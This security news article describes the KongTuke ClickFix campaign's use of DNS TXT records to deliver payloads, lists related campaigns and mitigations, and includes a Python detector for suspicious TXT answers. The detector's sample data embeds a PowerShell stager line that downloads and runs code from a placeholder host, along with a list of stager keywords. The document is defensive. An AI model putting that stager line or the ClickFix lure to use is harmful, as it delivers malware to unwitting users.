Cybercriminals Exploit DNS TXT Records in Advanced ClickFix Attacks
In the ever-evolving landscape of cyber threats, the KongTuke campaign has emerged as a formidable adversary, continuously refining its tactics to circumvent traditional security measures. Since mid-2025, this group has been leveraging the ClickFix technique—a sophisticated social engineering method designed to deceive users into executing malicious code under the guise of resolving fictitious browser issues.
Understanding the ClickFix Technique
The ClickFix strategy capitalizes on user trust and the innate desire to troubleshoot perceived problems. Victims visiting compromised legitimate websites are confronted with fake browser errors or CAPTCHA verifications. These deceptive prompts instruct users to copy a provided script and paste it into their system’s Run dialog or PowerShell terminal. Unbeknownst to them, this action initiates the execution of malicious code, effectively turning the user into an unwitting accomplice in the attack.
Evolution: Incorporating DNS TXT Records
Recent analyses by cybersecurity experts have unveiled a significant advancement in the KongTuke campaign’s methodology. The attackers now employ DNS TXT records to stealthily deliver the next stage of their payload. This technique involves embedding malicious commands within DNS responses, thereby obfuscating the payload and complicating detection efforts.
Traditionally, the initial ClickFix script would reach out to a web server via HTTP to retrieve additional malicious code. However, by utilizing DNS TXT records, the attackers can bypass standard HTTP traffic monitoring. When the victim executes the initial script, it performs a DNS lookup for a specific TXT record associated with a seemingly legitimate domain. This record contains encoded commands that, once decoded, fetch and execute the final payload.
Implications of DNS-Based Payload Delivery
The use of DNS TXT records for payload delivery presents several challenges for cybersecurity defenses:
1. Evasion of Traditional Detection Mechanisms: DNS traffic is typically less scrutinized than HTTP traffic, allowing malicious commands embedded within DNS responses to evade detection.
2. Fileless Execution: By executing commands directly from memory without writing files to disk, the attackers minimize forensic artifacts, making post-infection analysis more difficult.
3. Persistence and Stealth: The final payloads often include remote access trojans (RATs) like Interlock, enabling persistent access and control over compromised systems while maintaining a low profile.
Broader Context: The Rise of ClickFix Attacks
The KongTuke campaign is not an isolated incident. Various threat actors have adopted and adapted the ClickFix technique to distribute a range of malware:
– SmartApeSG Campaign: This campaign evolved from using fake browser update pages to employing ClickFix-style techniques, tricking users into verifying their identity through fake CAPTCHA pages, leading to the deployment of NetSupport RAT. ([cybersecuritynews.com](https://cybersecuritynews.com/smartapesg-campaign-leverages-clickfix-technique/?utm_source=openai))
– LUMMAC.V2 Stealer: An evolution of the LUMMAC credential stealer, this variant uses ClickFix methods to deceive users into executing malicious commands, resulting in the exfiltration of sensitive information. ([cybersecuritynews.com](https://cybersecuritynews.com/new-lummac-v2-stealer-using-clickfix-technique/?utm_source=openai))
– CastleLoader Malware: This malware utilizes Cloudflare-themed ClickFix phishing pages to compromise Windows hosts, leading to the installation of information stealers and remote-access trojans. ([cybersecuritynews.com](https://cybersecuritynews.com/castleloader-attack-using-cloudflare-themed-clickfix-technique/?utm_source=openai))
– Kimsuky Hackers: The North Korean threat group Kimsuky has adopted the ClickFix technique to deceive users into executing malicious scripts, further highlighting the widespread adoption of this method. ([cybersecuritynews.com](https://cybersecuritynews.com/kimsuky-hackers-using-clickfix-technique/?utm_source=openai))
Mitigation Strategies
To defend against these sophisticated attacks, organizations and individuals should implement the following measures:
1. User Education: Train users to recognize and avoid deceptive prompts instructing them to execute scripts or commands, especially those presented as solutions to fabricated issues.
2. Monitor DNS Traffic: Implement monitoring solutions that can detect anomalous DNS queries and responses, particularly those involving TXT records.
3. Restrict PowerShell Execution: Apply policies that limit the execution of PowerShell scripts, especially those initiated by users without administrative privileges.
4. Regular Security Audits: Conduct periodic reviews of security configurations and logs to identify and address potential vulnerabilities or signs of compromise.
5. Update and Patch Systems: Ensure that all systems and software are up-to-date with the latest security patches to mitigate known vulnerabilities.
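The TXT-record stage described above, and the DNS monitoring recommended in step 2, can be checked with heuristics rather than signatures. The following detector is an added example, not code from the article or from any vendor: it scans DNS answer records and flags TXT responses that carry script-stager tokens, either in cleartext or after base64 decoding, while allowlisting the well-known benign TXT formats (SPF, DKIM, DMARC, domain-verification proofs). The sample records, the `.invalid` domains and the heuristic thresholds are all constructed for illustration.

```python
import base64
import re

# Constructed sample DNS answers (client, name, qtype, rdata); not real traffic.
# The third record carries a base64-encoded stager-style command on a reserved .invalid name.
_STAGE = "IEX (New-Object Net.WebClient).DownloadString('http://stage2.example.invalid/x')"
SAMPLE_ANSWERS = [
    ("10.0.0.5", "example.com", "TXT", "v=spf1 include:_spf.example.com -all"),
    ("10.0.0.5", "sel1._domainkey.example.com", "TXT", "v=DKIM1; k=rsa; p=" + "A" * 360),
    ("10.0.0.7", "cdn-verify.example.invalid", "TXT", base64.b64encode(_STAGE.encode()).decode()),
]

# Well-known benign TXT prefixes (SPF, DKIM, DMARC, domain-ownership proofs).
ALLOW_PREFIXES = ("v=spf1", "v=dkim1", "v=dmarc1", "google-site-verification=", "ms=")
# Tokens that have no business in a TXT record but are typical of a script stager.
SUSPECT_TOKENS = ("powershell", "iex", "invoke-expression", "downloadstring",
                  "frombase64string", "mshta", "cmd /c")
_B64 = re.compile(r"^[A-Za-z0-9+/]{16,}={0,2}$")

def _decode_candidates(rdata):
    """Yield the record text as-is, plus any base64 decoding that is printable text."""
    yield rdata
    compact = rdata.replace(" ", "")
    if _B64.match(compact) and len(compact) % 4 == 0:
        raw = base64.b64decode(compact)
        for enc in ("utf-8", "utf-16-le"):  # -EncodedCommand style payloads are UTF-16LE
            try:
                text = raw.decode(enc)
            except UnicodeDecodeError:
                continue
            if text.isprintable():
                yield text

def txt_record_findings(qtype, rdata):
    """Return the reasons a TXT answer looks like stager delivery (empty list if benign)."""
    if qtype != "TXT" or rdata.lower().startswith(ALLOW_PREFIXES):
        return []
    reasons = []
    for text in _decode_candidates(rdata):
        hits = [t for t in SUSPECT_TOKENS if t in text.lower()]
        if hits:
            where = "cleartext" if text == rdata else "base64-decoded text"
            reasons.append("command tokens %s in %s" % (hits, where))
    if _B64.match(rdata.replace(" ", "")) and len(rdata) >= 64:
        reasons.append("opaque base64 blob of %d chars" % len(rdata))
    return reasons

def scan(answers):
    """Map (client, name) to findings for every answer that trips a heuristic."""
    return {(c, n): r for c, n, q, d in answers if (r := txt_record_findings(q, d))}
```

The allowlist is prefix-based on purpose: a long DKIM public key is base64 too, so length or entropy alone would produce false positives on every mail domain.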
Conclusion
The KongTuke campaign’s integration of DNS TXT records into the ClickFix technique underscores the continuous evolution of cyber threats. By understanding these methods and implementing robust security practices, organizations can enhance their defenses against such sophisticated attacks.